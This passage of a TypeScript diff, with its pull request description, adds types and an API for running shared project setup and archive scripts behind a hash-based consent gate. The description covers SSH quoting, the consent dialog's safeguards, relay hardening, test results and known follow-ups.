    *  approved"). Copy only — never a grant; the grant is the hash comparison. */
   previouslyApproved: boolean

--- a/src/shared/project-settings.ts
+++ b/src/shared/project-settings.ts
@@ -337,6 +337,43 @@ export function resolveProjectSettings(
 
 export type ProjectTrustFamily = 'setup' | 'agents' | 'shell'
 
+/** Which of the setup family's two scripts a run executes. */
+export type ProjectSetupKind = 'setup' | 'archive'
+
+/** main→renderer: raise the consent dialog for ONE shared-sourced script about to run. Approving
+ *  covers the whole `setup` family (both scripts are hashed together), so `script` is what is about
+ *  to run, not the full extent of what is being approved — the dialog says so. */
+export interface ProjectSetupConsentRequest {
+  requestId: string
+  kind: ProjectSetupKind
+  projectName: string
+  /** Human-readable location ("~/code/app" or "user@host:/srv/app"). */
+  locationLabel: string
+  /** The script about to run (the family's OTHER script is covered by the same approval). */
+  script: string
+  /** A prior approval exists for this family at this location (dialog copy: "changed since you
+   *  approved"). Copy only — never a grant; the grant is the hash comparison. */
+  previouslyApproved: boolean
+}
+
+export type ProjectSetupConsentAnswer = 'approve' | 'skip'
+
+export type ProjectSetupRunResult =
+  | { status: 'started'; runKey: string; waitForSetup: boolean }
+  | { status: 'skipped'; reason: 'no-script' | 'declined' | 'unanswered' | 'busy' | 'unavailable' }
+
+/** main→renderer per-run progress on `IPC.projectSetupEvent(projectId)`. `seq` is monotonic per
+ *  run, so a client that misses one knows it. */
+export interface ProjectSetupEvent {
+  runKey: string
+  kind: ProjectSetupKind
+  seq: number
+  state: 'running' | 'done' | 'failed' | 'cancelled'
+  /** Appended output since the last event (stdout+stderr interleaved, capped). */
+  chunk?: string
+  exitCode?: number
+}
+
 /**
  * Canonical string covering EVERYTHING executable a family ships — the same shape of problem
  * `execTrusted` (node-exec.ts) solves for shell/ssh fields: a caller compares this against what it

--- a/src/shared/types.ts
+++ b/src/shared/types.ts
@@ -214,6 +214,16 @@ export interface PendingLaunch {
   after: string[]
   /** Delivered to the node's shell once the wait is over (agent CLI + prompt, or a plain command). */
   command: string
+  /**
+   * Also wait for this worktree GROUP's project setup script to finish (`waitForSetup`). Set when
+   * the node is opened into a frame whose checkout is still being prepared — running a command in a
+   * half-installed worktree is the failure this gate exists to prevent. It names a group id, never
+   * a command: nothing here is ever executed, it only selects a run to ask about.
+   *
+   * A group with no run on record counts as done (`launchesToFire`), so a persisted arming that
+   * outlives the run's event stream — an app restart — releases rather than strands the node.
+   */
+  awaitSetupGroup?: string
 }
 
 export interface CanvasNodeState {

--- a/src/shared/types.ts
+++ b/src/shared/types.ts
@@ -768,6 +768,31 @@ export interface ProjectSettingsApi {
   ): Promise<boolean>
 }
 
+export interface ProjectSetupApi {
+  /** Launch a project's setup/archive script behind the trust gate (`project-setup-service.ts`).
+   *  `worktreePath`, when given, is the ONLY path-shaped hint this call carries — main derives
+   *  `rootPath`/`ssh` from its own workspace index by `projectId` and independently validates
+   *  `worktreePath` against that project's actual git worktrees; nothing path-shaped sent here is
+   *  trusted as-is (Task 1 review finding). */
+  run(
+    projectId: string,
+    kind: import('./project-settings').ProjectSetupKind,
+    worktreePath?: string
+  ): Promise<import('./project-settings').ProjectSetupRunResult>
+  /** Aborts a live run, or one still waiting at its consent dialog. `false` = nothing by that
+   *  runKey exists (already finished, or never did). */
+  cancel(runKey: string): Promise<boolean>
+  /** Renderer's answer to a `onConsentRequest` prompt. A stale/unknown requestId is a silent no-op. */
+  consent(requestId: string, answer: import('./project-settings').ProjectSetupConsentAnswer): Promise<void>
+  /** main → renderer: raise the trust dialog before a shared-sourced script runs. */
+  onConsentRequest(cb: (req: import('./project-settings').ProjectSetupConsentRequest) => void): () => void
+  /** main → renderer: close a prompt nobody answered before the renderer did. */
+  onConsentDismiss(cb: (p: { requestId: string }) => void): () => void
+  /** Per-project run progress (`ProjectSetupEvent`), mirroring `boardLog.onChanged`'s ref-counted
+   *  subscribe/unsubscribe shape. */
+  onEvent(projectId: string, cb: (ev: import('./project-settings').ProjectSetupEvent) => void): () => void
+}
+
 export interface DialogApi {
   /** Opens a native folder picker; returns the chosen path or null if cancelled. */
   selectFolder(): Promise<string | null>
@@ -2478,6 +2503,7 @@ export interface NodeTerminalApi {
   pty: PtyApi
   workspace: WorkspaceApi
   projectSettings: ProjectSettingsApi
+  projectSetup: ProjectSetupApi
   dialog: DialogApi
   settings: SettingsApi
   speech: SpeechApi


### PR DESCRIPTION
## Summary

PR3 of the Project Settings series — **stacked on #317** (panel), which stacks on #315 (core). This is the security-central PR: it executes scripts from the git-shared `settings.json`, behind a consent gate.

- **`ProjectSetupService` (core, both shells)** — the gate: only SHARED-sourced scripts are gated (your own local overrides run promptless); the hash covers the family's full executable content (setup + archive together) computed from the shared doc alone; approval is recorded **before** the run; skip/expiry/dismiss never record; prompts are serialized app-wide with a 300 s expiry; single-flight per location; per-run `runId` on every event.
- **Local runner** — `spawn`, never keystroke injection; process-group SIGKILL (tests caught a real orphaned-pipe hang), 512 KB capped + 150 ms debounced streaming, 10 min timeout, quit-time `disposeAll` teardown. The run IPC accepts only `(projectId, kind, worktreePath?)` — main re-derives every path from its own index and validates `worktreePath` against `git worktree list`.
- **Streaming SSH runner** (manual runs on SSH projects) — first streaming remote exec in the tree: ControlMaster args, every interpolated value posix-quoted (tilde-preserving `cd`), **full-endpoint** connection resolution (host+user+port+cwd — a same-path different-port container can neither be mis-selected nor block a legit sibling), honest cancel semantics (killing the local client cannot stop a non-tty remote; the chunk says so).
- **Consent dialog** — shows BOTH family scripts verbatim (approval covers the family), bidi/Trojan-source-neutralized rendering, clamped labels, `enterConfirms=false` + no autofocus + dialog-stack participation, dismiss is never an answer, one submission per request.
- **Relay hardening** — `project-setup:run` / `consent-submit` / `cancel` are host-only channels on the Electron relay (dispatch AND cast legs; shared `isHostOnlyChannel` predicate), and consent payloads are delivered to the main window only — a relay guest can no longer trigger, see, or self-approve a trust prompt. (Server Edition deliberately ungated: its clients are authenticated operators, not peers — evidence in the review notes.)
- **Worktree lifecycle** — setup runs after a worktree group is created (dialog and agent-verb paths share the trigger), archive on unbind/remove (result-awaited only — removal never blocks on a hung script); `waitForSetup` arms agent nodes opened into the group via `awaitSetupGroup` + a pure `setupGateDone` (pending-counter guards the whole consent window; failed setups keep nodes armed and the group chip becomes a re-run button); `sshTrustKey` is port-scoped.

## Known follow-ups (deliberate, in the series' later waves)

Archive outcomes have no UI surface yet (binding drops before events land); setup OUTPUT events still broadcast to relay peers unscoped (status quo for all channels; scoping is the follow-up) and shell error text can echo script fragments; window-closed prompts expire at 300 s instead of bailing fast (queue-head cost); `disposeAll`'s docstring slightly over-claims the ssh leg (remote may outlive quit — the code says so honestly, one sentence needs trimming); consent-stage cancel restores the prior group badge; settings-panel copy doesn't yet mention adopt/re-bind triggers. Live SSH + Mac device verification owed.

## Test plan

- +157 tests over PR2's baseline (service gate incl. shared-only-hash and cancel-in-gate races, runner discipline incl. real-spawn orphan-kill and cap/debounce, ssh quoting/mutation checks, dialog security behaviors, store fold/lanes/pending, arming DAG matrix, host-only channel refusals, disposeAll).
- Full suite: 7580 passed / 12 skipped; typecheck clean on both configs.

🤖 Generated with [Claude Code](https://claude.com/claude-code)